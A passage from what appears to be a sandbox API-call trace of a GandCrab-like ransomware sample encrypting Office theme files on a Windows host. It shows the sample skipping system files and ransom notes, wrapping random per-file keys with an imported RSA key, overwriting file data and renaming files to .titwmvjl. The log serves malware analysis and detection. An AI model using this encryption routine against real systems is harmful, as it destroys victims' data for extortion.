lpString2="iconcache.db") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="bootsect.bak") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="boot.ini") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="ntuser.dat.log") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="thumbs.db") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0076.215] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="ntldr") returned 1 [0076.216] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="NTDETECT.COM") returned 1 [0076.216] lstrcmpiW (lpString1="TM04033925[[fn=Droplet]].thmx", lpString2="Bootfont.bin") returned 1 [0076.216] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned 131 [0076.216] lstrlenW (lpString=".thmx") returned 5 [0076.216] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0076.216] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0076.216] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.216] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0076.216] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033925[[fn=droplet]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0076.216] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.217] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0076.218] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.218] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.218] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0076.218] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0076.219] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0076.219] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0076.219] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0076.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.219] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.219] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.219] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0076.220] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0076.220] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0076.220] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0076.220] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0076.220] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.220] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.220] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.221] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.221] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0076.221] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.221] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0076.221] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.222] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0076.222] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.222] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0076.222] GetLastError () returned 0x0 [0076.222] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.222] CryptDestroyKey (hKey=0x503738) returned 1 [0076.222] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.223] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.223] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0076.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.224] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5035b8) returned 1 [0076.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.224] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0076.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.224] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0076.225] GetLastError () returned 0x0 [0076.225] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.225] CryptDestroyKey (hKey=0x5035b8) returned 1 [0076.225] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.225] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.225] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0076.225] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0076.226] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0076.301] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.301] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0076.326] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.326] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0076.328] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.332] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.335] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.336] CloseHandle (hObject=0x2ec) returned 1 [0076.363] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033925[[fn=droplet]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033925[[fn=droplet]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0076.364] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.365] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0076.365] lstrcmpW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2=".") returned 1 [0076.365] lstrcmpW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="..") returned 1 [0076.365] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033927[[fn=Main Event]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx" [0076.365] lstrlenW (lpString=".titwmvjl") returned 9 [0076.365] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned 134 [0076.365] VirtualAlloc (lpAddress=0x0, dwSize=0x14c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0076.365] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx.titwmvjl") returned 143 [0076.365] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned 134 [0076.365] lstrlenW (lpString=".thmx") returned 5 [0076.365] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0076.365] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0076.365] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0076.365] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.365] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned 134 [0076.365] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned 134 [0076.365] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="desktop.ini") returned 1 [0076.365] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="autorun.inf") returned 1 [0076.365] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="ntuser.dat") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="iconcache.db") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="bootsect.bak") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="boot.ini") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="ntuser.dat.log") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="thumbs.db") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="ntldr") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="NTDETECT.COM") returned 1 [0076.366] lstrcmpiW (lpString1="TM04033927[[fn=Main Event]].thmx", lpString2="Bootfont.bin") returned 1 [0076.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned 134 [0076.366] lstrlenW (lpString=".thmx") returned 5 [0076.366] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0076.366] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0076.366] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.366] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0076.366] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033927[[fn=main event]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0076.367] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.367] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0076.380] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.381] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.381] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0076.381] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0076.381] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0076.382] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0076.382] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0076.382] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.382] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.382] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.382] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.382] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0076.382] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0076.383] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0076.383] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0076.383] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0076.383] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.383] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.383] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.383] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.383] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0076.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.384] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503938) returned 1 [0076.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.384] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0076.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.384] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0076.384] GetLastError () returned 0x0 [0076.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.384] CryptDestroyKey (hKey=0x503938) returned 1 [0076.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.385] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.385] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.385] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0076.385] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.385] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5035b8) returned 1 [0076.385] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.386] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0076.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.386] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0076.386] GetLastError () returned 0x0 [0076.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.386] CryptDestroyKey (hKey=0x5035b8) returned 1 [0076.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0076.387] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0076.387] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0076.387] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0076.387] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0076.470] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.470] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0076.490] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.490] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0076.492] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.496] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.500] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.500] CloseHandle (hObject=0x2ec) returned 1 [0076.954] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033927[[fn=main event]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033927[[fn=main event]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0076.955] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.956] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0076.956] lstrcmpW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2=".") returned 1 [0076.956] lstrcmpW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="..") returned 1 [0076.956] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033929[[fn=Slate]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx" [0076.956] lstrlenW (lpString=".titwmvjl") returned 9 [0076.956] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned 129 [0076.956] VirtualAlloc (lpAddress=0x0, dwSize=0x142, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0076.956] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx.titwmvjl") returned 138 [0076.956] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned 129 [0076.956] lstrlenW (lpString=".thmx") returned 5 [0076.956] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0076.956] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0076.956] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0076.956] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned 129 [0076.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned 129 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="desktop.ini") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="autorun.inf") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="ntuser.dat") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="iconcache.db") returned 1 [0076.957] lstrcmpiW (lpString1="TM04033929[[fn=Slate]].thmx", lpString2="bootsect.bak") returned 1 [0076.957] 